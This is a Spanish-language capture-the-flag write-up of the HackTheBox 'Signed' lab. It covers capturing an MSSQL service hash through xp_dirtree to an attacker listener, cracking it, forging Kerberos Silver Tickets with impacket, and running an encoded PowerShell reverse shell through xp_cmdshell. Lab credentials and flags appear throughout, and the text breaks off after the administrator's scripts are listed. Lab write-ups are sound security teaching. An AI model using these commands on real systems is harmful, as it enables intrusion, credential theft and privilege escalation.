This page looks best with JavaScript enabled

HackTheBox - Signed

 •  ✍️ sckull
featured image

Signed expone el servicio MSSQL, con acceso a este logramos capturar el hash NTLM de un primer usuario. Con este, descubrimos un login de un grupo con el rol de sysadmin. Suplantamos la identidad de este a traves de Silver Ticket, lo que nos dio acceso inicial. Tras la creacion de un ticket nuevo con el grupo de Domain Admins logramos leer archivos y, a traves de ’execute as’ listar archivos, con esto, logramos obtener credenciales en el historial del administrador para finalmente ejecutar una shell inversa para este usuario.

Nombre Signed
OS

Windows

Puntos 30
Dificultad Medium
Fecha de Salida 2025-10-11
IP 10.10.11.90
Maker

kavigihan

Rated 
{
    "type": "bar",
    "data":  {
        "labels": ["Cake", "VeryEasy", "Easy", "TooEasy", "Medium", "BitHard","Hard","TooHard","ExHard","BrainFuck"],
        "datasets": [{
            "label": "User Rated Difficulty",
            "data": [121, 68, 321, 555, 1140, 849, 660, 201, 63, 93],
            "backgroundColor": ["#9fef00","#9fef00","#9fef00", "#ffaf00","#ffaf00","#ffaf00","#ffaf00", "#ff3e3e","#ff3e3e","#ff3e3e"]
        }]
    },
    "options": {
        "scales": {
          "xAxes": [{"display": false}],
          "yAxes": [{"display": false}]
        },
        "legend": {"labels": {"fontColor": "white"}},
        "responsive": true
      }
}

Machine Information: Certified

La descripcion de la maquina emula una situacion “real” de un pentest proporcionando credenciales.

As is common in real life Windows penetration tests, you will start the Signed box with credentials for the following account which can be used to access the MSSQL service: scott / Sm230#C5NatH

Recon

nmap

nmap unicamente muestra el puerto mssql (1433).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

# Nmap 7.95 scan initiated Sun Oct 12 21:12:07 2025 as: /usr/lib/nmap/nmap --privileged -p1433 -sV -sC -oN nmap_scan 10.10.11.90
Nmap scan report for 10.10.11.90
Host is up (0.088s latency).

PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info: 
|   10.10.11.90:1433: 
|     Version: 
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.10.11.90:1433: 
|     Target_Name: SIGNED
|     NetBIOS_Domain_Name: SIGNED
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: SIGNED.HTB
|     DNS_Computer_Name: DC01.SIGNED.HTB
|     DNS_Tree_Name: SIGNED.HTB
|_    Product_Version: 10.0.17763
|_ssl-date: 2025-10-13T03:12:07+00:00; -13s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-12T11:18:04
|_Not valid after:  2055-10-12T11:18:04

Host script results:
|_clock-skew: mean: -13s, deviation: 0s, median: -13s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 12 21:12:20 2025 -- 1 IP address (1 host up) scanned in 12.65 seconds

Agregamos a nuestro archivo /etc/hosts los valores signed.htb dc01.signed.htb.

Service Access

Las credenciales tienen acceso por mssql.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22

❯ impacket-mssqlclient -dc-ip 10.10.11.89 -p 1433 scott:'Sm230#C5NatH'@signed.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (scott  guest@master)> select user_name();
        
-----   
guest   

SQL (scott  guest@master)> SELECT SYSTEM_USER
        
-----   
scott   

SQL (scott  guest@master)>

El usuario tiene permisos limitados en la maquina.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

SQL (scott  guest@master)> xp_cmdshell whoami
ERROR(DC01): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL (scott  guest@master)> enable_xp_cmdshell
ERROR(DC01): Line 105: User does not have permission to perform this action.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(DC01): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (scott  guest@master)> xp_dirtree C:/
subdirectory   depth   file   
------------   -----   ----   
SQL (scott  guest@master)>

Capture the Hash

Sin embargo podemos utilizar xp_dirtree para capturar el hash del usuario.

1
2
3
4

SQL (scott  guest@master)> xp_dirtree \\10.10.14.2\sc\
subdirectory   depth   file   
------------   -----   ----   
SQL (scott  guest@master)>

Tras ejecutar responder observamos que se capturo el hash NTLM del usuario mssqlsvc.

1
2
3
4
5
6

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.90
[SMB] NTLMv2-SSP Username : SIGNED\mssqlsvc
[SMB] NTLMv2-SSP Hash     : mssqlsvc::SIGNED:ffa3bb8b988148be:43520051A61CA1815C97C8337C6CA9C3:0101000000000000806B70C7C23BDC011A49DF7012BEF0D70000000002000800430057005800330001001E00570049004E002D00570035005300560050004F0055004A0030003600540004003400570049004E002D00570035005300560050004F0055004A003000360054002E0043005700580033002E004C004F00430041004C000300140043005700580033002E004C004F00430041004C000500140043005700580033002E004C004F00430041004C0007000800806B70C7C23BDC01060004000200000008003000300000000000000000000000003000005256C637B7E4D2C874A2F6089309E1DA4885258151F1E0CD139E13E9F28261E80A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0032000000000000000000
[*] Skipping previously captured hash for SIGNED\mssqlsvc

Cracking the Hash

Ejecutamos john con el wordlist rockyou.txt sobre el archivo de hash.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

❯ john SMB-NTLMv2-SSP-10.10.11.90.txt --wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 8 password hashes with 8 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
purPLE9795!@     (mssqlsvc)     
purPLE9795!@     (mssqlsvc)     
purPLE9795!@     (mssqlsvc)     
purPLE9795!@     (mssqlsvc)     
8g 0:00:00:08 DONE (2025-10-12 21:55) 0.9501g/s 532917p/s 4263Kc/s 4263KC/s purcitititya..puppuh
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

User - mssqlsvc

Con las credenciales nos autenticamos en el servicio mssql.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22

❯ impacket-mssqlclient -dc-ip 10.10.11.89 -p 1433 mssqlsvc:'purPLE9795!@'@signed.htb -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (SIGNED\mssqlsvc  guest@master)> select user_name();
        
-----   
guest   

SQL (SIGNED\mssqlsvc  guest@master)> SELECT SYSTEM_USER
                  
---------------   
SIGNED\mssqlsvc   

SQL (SIGNED\mssqlsvc  guest@master)>

Con este usuario es posible listar los archivos locales.

1
2
3
4
5
6

SQL (SIGNED\mssqlsvc  guest@master)> xp_dirtree c:/Users/mssqlsvc/Desktop
subdirectory   depth   file   
------------   -----   ----   
user.txt           1      1   

SQL (SIGNED\mssqlsvc  guest@master)>

enum_logins muestra que el grupo IT tiene el rol sysadmin.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

SQL (SIGNED\mssqlsvc  guest@master)> enum_logins
name                                type_desc       is_disabled   sysadmin   securityadmin   serveradmin   setupadmin   processadmin   diskadmin   dbcreator   bulkadmin   
---------------------------------   -------------   -----------   --------   -------------   -----------   ----------   ------------   ---------   ---------   ---------   
sa                                  SQL_LOGIN                 0          1               0             0            0              0           0           0           0   

##MS_PolicyEventProcessingLogin##   SQL_LOGIN                 1          0               0             0            0              0           0           0           0   

##MS_PolicyTsqlExecutionLogin##     SQL_LOGIN                 1          0               0             0            0              0           0           0           0   

SIGNED\IT                           WINDOWS_GROUP             0          1               0             0            0              0           0           0           0   

NT SERVICE\SQLWriter                WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0   

NT SERVICE\Winmgmt                  WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0   

NT SERVICE\MSSQLSERVER              WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0   

NT AUTHORITY\SYSTEM                 WINDOWS_LOGIN             0          0               0             0            0              0           0           0           0   

NT SERVICE\SQLSERVERAGENT           WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0   

NT SERVICE\SQLTELEMETRY             WINDOWS_LOGIN             0          0               0             0            0              0           0           0           0   

scott                               SQL_LOGIN                 0          0               0             0            0              0           0           0           0   

SIGNED\Domain Users                 WINDOWS_GROUP             0          0               0             0            0              0           0           0           0   

SQL (SIGNED\mssqlsvc  guest@master)>

Enumerating Domain Users/Groups

A traves de MSSQL podemos realizar la enumeracion de usuarios, conociendo el dominio y el nombre de usuario o grupo tambien, es posible a traves de ‘fuzz’ al SID.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

SQL (SIGNED\mssqlsvc  guest@master)> SELECT DEFAULT_DOMAIN()
         
------   
SIGNED   

SQL (SIGNED\mssqlsvc  guest@master)> SELECT SUSER_SID('SIGNED\Domain Admins')
                                                              
-----------------------------------------------------------   
b'0105000000000005150000005b7bb0f398aa2245ad4a1ca400020000'   

SQL (SIGNED\mssqlsvc  guest@master)> SELECT SUSER_SNAME(0x0105000000000005150000005b7bb0f398aa2245ad4a1ca400020000)
                       
--------------------   
SIGNED\Domain Admins   

SQL (SIGNED\mssqlsvc  guest@master)>

Para ‘fuzz’, podemos enumeramos usuarios a traves del modulo mssql_enum_domain_accounts de metasploit.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

msf > use auxiliary/admin/mssql/mssql_enum_domain_accounts
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > show options 

Module options (auxiliary/admin/mssql/mssql_enum_domain_accounts):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   FuzzNum              10000            yes       Number of principal_ids to fuzz.
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                1433             yes       The target port (TCP)
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentication (requires DOMAIN option set)


View the full module info with the info, or info -d command.

msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > set password purPLE9795!@
password => purPLE9795!@
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > set username mssqlsvc
username => mssqlsvc
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > set rhosts 10.10.11.90
rhosts => 10.10.11.90
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > set USE_WINDOWS_AUTHENT true
USE_WINDOWS_AUTHENT => true
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) >

El modulo encontro el SID del dominio junto con 48 usuarios y grupos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59

msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > run
[*] Running module against 10.10.11.90
[*] 10.10.11.90:1433 - Attempting to connect to the database server at 10.10.11.90:1433 as mssqlsvc...
[+] 10.10.11.90:1433 - Connected.
[*] 10.10.11.90:1433 - SQL Server Name: DC01
[*] 10.10.11.90:1433 - Domain Name: SIGNED
[+] 10.10.11.90:1433 - Found the domain sid: 0105000000000005150000005b7bb0f398aa2245ad4a1ca4
[*] 10.10.11.90:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient...
[*] 10.10.11.90:1433 -  - SIGNED\Administrator
[*] 10.10.11.90:1433 -  - SIGNED\Guest
[*] 10.10.11.90:1433 -  - SIGNED\krbtgt
[*] 10.10.11.90:1433 -  - SIGNED\Domain Admins
[*] 10.10.11.90:1433 -  - SIGNED\Domain Users
[*] 10.10.11.90:1433 -  - SIGNED\Domain Guests
[*] 10.10.11.90:1433 -  - SIGNED\Domain Computers
[*] 10.10.11.90:1433 -  - SIGNED\Domain Controllers
[*] 10.10.11.90:1433 -  - SIGNED\Cert Publishers
[*] 10.10.11.90:1433 -  - SIGNED\Schema Admins
[*] 10.10.11.90:1433 -  - SIGNED\Enterprise Admins
[*] 10.10.11.90:1433 -  - SIGNED\Group Policy Creator Owners
[*] 10.10.11.90:1433 -  - SIGNED\Read-only Domain Controllers
[*] 10.10.11.90:1433 -  - SIGNED\Cloneable Domain Controllers
[*] 10.10.11.90:1433 -  - SIGNED\Protected Users
[*] 10.10.11.90:1433 -  - SIGNED\Key Admins
[*] 10.10.11.90:1433 -  - SIGNED\Enterprise Key Admins
[*] 10.10.11.90:1433 -  - SIGNED\RAS and IAS Servers
[*] 10.10.11.90:1433 -  - SIGNED\Allowed RODC Password Replication Group
[*] 10.10.11.90:1433 -  - SIGNED\Denied RODC Password Replication Group
[*] 10.10.11.90:1433 -  - SIGNED\DC01$
[*] 10.10.11.90:1433 -  - SIGNED\DnsAdmins
[*] 10.10.11.90:1433 -  - SIGNED\DnsUpdateProxy
[*] 10.10.11.90:1433 -  - SIGNED\mssqlsvc
[*] 10.10.11.90:1433 -  - SIGNED\HR
[*] 10.10.11.90:1433 -  - SIGNED\IT
[*] 10.10.11.90:1433 -  - SIGNED\Finance
[*] 10.10.11.90:1433 -  - SIGNED\Developers
[*] 10.10.11.90:1433 -  - SIGNED\Support
[*] 10.10.11.90:1433 -  - SIGNED\oliver.mills
[*] 10.10.11.90:1433 -  - SIGNED\emma.clark
[*] 10.10.11.90:1433 -  - SIGNED\liam.wright
[*] 10.10.11.90:1433 -  - SIGNED\noah.adams
[*] 10.10.11.90:1433 -  - SIGNED\ava.morris
[*] 10.10.11.90:1433 -  - SIGNED\sophia.turner
[*] 10.10.11.90:1433 -  - SIGNED\james.morgan
[*] 10.10.11.90:1433 -  - SIGNED\mia.cooper
[*] 10.10.11.90:1433 -  - SIGNED\elijah.brooks
[*] 10.10.11.90:1433 -  - SIGNED\isabella.evans
[*] 10.10.11.90:1433 -  - SIGNED\lucas.murphy
[*] 10.10.11.90:1433 -  - SIGNED\william.johnson
[*] 10.10.11.90:1433 -  - SIGNED\charlotte.price
[*] 10.10.11.90:1433 -  - SIGNED\henry.bennett
[*] 10.10.11.90:1433 -  - SIGNED\amelia.kelly
[*] 10.10.11.90:1433 -  - SIGNED\jackson.gray
[*] 10.10.11.90:1433 -  - SIGNED\harper.diaz
[*] 10.10.11.90:1433 -  - SIGNED\SQLServer2005SQLBrowserUser$DC01
[+] 10.10.11.90:1433 - 48 user accounts, groups, and computer accounts were found.
[*] 10.10.11.90:1433 - Query results have been saved to: /home/kali/.msf4/loot/20251012231030_default_10.10.11.90_mssql.domain.acc_686396.txt
[*] Auxiliary module execution completed
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) >

Se creo un wordlist con los usuarios y grupos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

❯ cat /home/kali/.msf4/loot/20251012231030_default_10.10.11.90_mssql.domain.acc_686396.txt | grep SIGNED | cut -d '\' -f2 | cut -d '"' -f1  > user_group.txt
❯ wc -l user_group.txt
47 user_group.txt
❯ head user_group.txt
Administrator
Allowed RODC Password Replication Group
Cert Publishers
Cloneable Domain Controllers
DC01$
Denied RODC Password Replication Group
Developers
DnsAdmins
DnsUpdateProxy
Domain Admins

Un script en python nos ayudo para obtener SID del dominio, se elimina -0.

1
2
3

❯ python sidtostr.py
S-1-5-21-4088429403-1159899800-2753317549-0

sysadmin via Silver Ticket

Silver Ticket

Con la informacion que tenemos podemos generar un Silver Ticket utilizando ticketer de impacket. Generamos el hash para la contrasena.

1
2
3

❯ python -c 'import hashlib,binascii; print(binascii.hexlify(hashlib.new("md4", "purPLE9795!@".encode("utf-16le")).digest()))'
b'ef699384c3285c54128a3ee1ddb1a0cc'

Con ello tenemos lo necesario para crear el ticket:

  • SID del Dominio: S-1-5-21-4088429403-1159899800-2753317549
  • NTHASH: ef699384c3285c54128a3ee1ddb1a0cc
  • Domain: signed.htb
  • SPN: mssqlsvc/dc01.signed.htb
  • User

En este caso creamos el ticket para el usuario mssqlsvc. Se especifica autenticacion por kerberos con el ticket en KRB5CCNAME, es valido para autenticarse por MSSQL.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

❯ impacket-ticketer -nthash ef699384c3285c54128a3ee1ddb1a0cc -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb -dc-ip 10.10.11.90 -spn mssqlsvc/dc01.signed.htb mssqlsvc
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for signed.htb/mssqlsvc
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in mssqlsvc.ccache
KRB5CCNAME=mssqlsvc.ccache impacket-mssqlclient signed.htb/mssqlsvc@dc01.signed.htb -no-pass -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (SIGNED\Administrator  guest@master)>

Sysadmin

A traves de Silver Ticket es posible suplantar la identidad de un usuario o grupo. Obtuvimos el RID del grupo IT ya que este tiene el rol sysadmin.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

# mssql 'shell'
SQL (SIGNED\mssqlsvc  guest@master)> SELECT SUSER_SID('SIGNED\IT')
                                                              
-----------------------------------------------------------   
b'0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000'   

SQL (SIGNED\mssqlsvc  guest@master)> 

# script
❯ python sidtostr.py 0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000
Converting 0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000
S-1-5-21-4088429403-1159899800-2753317549-1105

Tras asignar el grupo, verificamos el rol y observamos que podemos ejecutar comandos con xp_cmdshell.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

❯ impacket-ticketer -nthash ef699384c3285c54128a3ee1ddb1a0cc -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb -dc-ip 10.10.11.90 -group 1105 -spn mssqlsvc/dc01.signed.htb mssqlsvc
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for signed.htb/mssqlsvc
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in mssqlsvc.ccache
KRB5CCNAME=mssqlsvc.ccache impacket-mssqlclient dc01.signed.htb -no-pass -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (SIGNED\Administrator  dbo@master)> SELECT IS_SRVROLEMEMBER('sysadmin') as sysadmin_check;
sysadmin_check   
--------------   
             1   

SQL (SIGNED\Administrator  dbo@master)> xp_cmdshell whoami
output            
---------------   
signed\mssqlsvc   

NULL              

SQL (SIGNED\Administrator  dbo@master)>

Se muestra como Administrador pero en realidad ejecuta los comandos como mssqlsvc.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

SQL (SIGNED\Administrator  dbo@master)> SELECT SYSTEM_USER
                       
--------------------   
SIGNED\Administrator   

SQL (SIGNED\Administrator  dbo@master)> xp_cmdshell whoami
output            
---------------   
signed\mssqlsvc   

NULL              

SQL (SIGNED\Administrator  dbo@master)>

User - mssqlsvc

Generamos una shell inversa en revshells y ejecutamos.

1

SQL (SIGNED\Administrator  dbo@master)> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMgAiACwAMQAzADMAOAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

Logramos acceder como mssqlsvc y a la flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21

❯ rlwrap nc -lvp 1338
listening on [any] 1338 ...
connect to [10.10.14.2] from signed.htb [10.10.11.90] 56647

PS C:\Windows\system32> whoami
signed\mssqlsvc
PS C:\Windows\system32> cd C:/users/mssqlsvc/desktop
PS C:\users\mssqlsvc\desktop> dir


    Directory: C:\users\mssqlsvc\desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-ar---       10/12/2025   4:16 AM             34 user.txt                                                              


PS C:\users\mssqlsvc\desktop> cat user.txt
9fc66a4c0156dccf9f12eda841f5fdb6
PS C:\users\mssqlsvc\desktop>

Impersonate Administrator

Si especificamos el RID del grupo Domain Admins y IT, junto con el RID del usuario mssqlsvc, este nos permite leer archivos ‘como administrador’. Sin embargo sigue ejecutando los comandos como mssqlsvc.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

❯ impacket-ticketer -nthash ef699384c3285c54128a3ee1ddb1a0cc -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb -dc-ip 10.10.11.90 -groups 512,1105 -user-id 1103 -spn mssqlsvc/dc01.signed.htb Administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for signed.htb/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in Administrator.ccache
KRB5CCNAME=Administrator.ccache impacket-mssqlclient dc01.signed.htb -no-pass -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (SIGNED\mssqlsvc  dbo@master)> SELECT SYSTEM_USER
                  
---------------   
SIGNED\mssqlsvc   

SQL (SIGNED\mssqlsvc  dbo@master)> SELECT * FROM OPENROWSET(BULK 'C:\Users\administrator\Desktop\root.txt', SINGLE_CLOB) AS c;
BulkColumn                                
---------------------------------------   
b'6e953c5b088e620c60433810bed4dbad\r\n'   

SQL (SIGNED\mssqlsvc  dbo@master)> xp_dirtree C:\Users\administrator\
subdirectory   depth   file   
------------   -----   ----   
SQL (SIGNED\mssqlsvc  dbo@master)> xp_cmdshell whoami
output            
---------------   
signed\mssqlsvc   

NULL              

SQL (SIGNED\mssqlsvc  dbo@master)>

EXECUTE AS

Utilizamos EXECUTE AS para suplantar la identidad del usuario Administrador, esto nos permite listar los archivos ‘como administrador’. Aunque, se limita a eso unicamente.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

SQL (SIGNED\mssqlsvc  dbo@master)> EXECUTE AS LOGIN = 'SIGNED\Administrator'
SQL (SIGNED\Administrator  guest@master)> xp_dirtree C:/Users/Administrator/
subdirectory       depth   file   
----------------   -----   ----   
3D Objects             1      0   

AppData                1      0   

Application Data       1      0   

Contacts               1      0   

Cookies                1      0   

Desktop                1      0   

# [... cut ...]

Templates              1      0   

Videos                 1      0   

SQL (SIGNED\Administrator  guest@master)> SELECT * FROM OPENROWSET(BULK 'C:\Users\administrator\Desktop\root.txt', SINGLE_CLOB) AS c;
ERROR(DC01): Line 1: You do not have permission to use the bulk load statement.
SQL (SIGNED\Administrator  guest@master)>

Enumerating Files

Por ahora tenemos dos formas para listar y leer archivos como administrador. Leer archivos a traves del Silver Ticket donde se especifica el grupo Domain Admins. Listar archivos a traves del Silver Ticket + EXECUTE AS. Utilizando estas dos podemos enumerar archivos en la maquina.

En Documents de administrator encontramos dos scripts en powershell.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

# Silver Ticket + EXECUTE AS "shell"
SQL (SIGNED\Administrator  guest@master)> xp_dirtree c:/Users/Administrator/Documents
subdirectory   depth   file   
------------   -----   ----   
cleanup.ps1        1      1   

My Music           1      0   

My Pictures        1      0   

My Videos          1      0   

restart.ps1        1      1   

SQL (SIGNED\Administrator  guest@master)>

Parecen ser scripts de mantenimiento.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

